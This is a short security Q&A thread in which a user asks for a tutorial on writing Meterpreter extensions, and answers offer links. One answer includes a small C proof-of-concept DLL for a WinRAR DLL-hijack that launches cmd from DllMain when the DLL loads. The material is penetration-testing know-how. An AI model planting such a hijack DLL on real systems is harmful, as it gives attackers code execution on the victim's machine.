# Looking for a tutorial on meterpreter extensions

Tags: penetration-test, meterpreter

A simple custom DLL source would be sufficient.  All of the links I find on Google are dead.  I don't mind reading some clear source if there's a tutorial DLL floating about.

I tried for meterpreter and custom-payload tags... sadly no dice.

Answer (score 2, accepted):

Here is a slightly outdated but good set of information on making extensions:

https://www.scriptjunkie.us/2011/08/writing-meterpreter-extensions/

Comment: @Simon will do in the future, but in this one instance the question was looking for a tutorial

Answer (score 2):

1. There is a sample DLL, either 'good' one and 'bad' one, including source, binary and full-blown example.
   http://seclists.org/fulldisclosure/2010/Sep/22
2. There is a more straight-forward example for WinRAR DLL hijack:    \

```
 #include "stdafx.h"
```

`#include "stdlib.h"

int g4h()
{
    WinExec("cmd", SW_SHOW);
    return 0;
}
BOOL APIENTRY DllMain( HANDLE hModule, 
                   DWORD  ul_reason_for_call, 
                   LPVOID lpReserved
                 )
{
   g4h();
   return TRUE;
}`

Enjoy!

Comment: thx.  i wound up having someone on IRC send me a link to one of mubix's articles.  it doesn't inject directly into memory...as in it requires upload first, but it's a starting point

Comment: I +1'd the post btw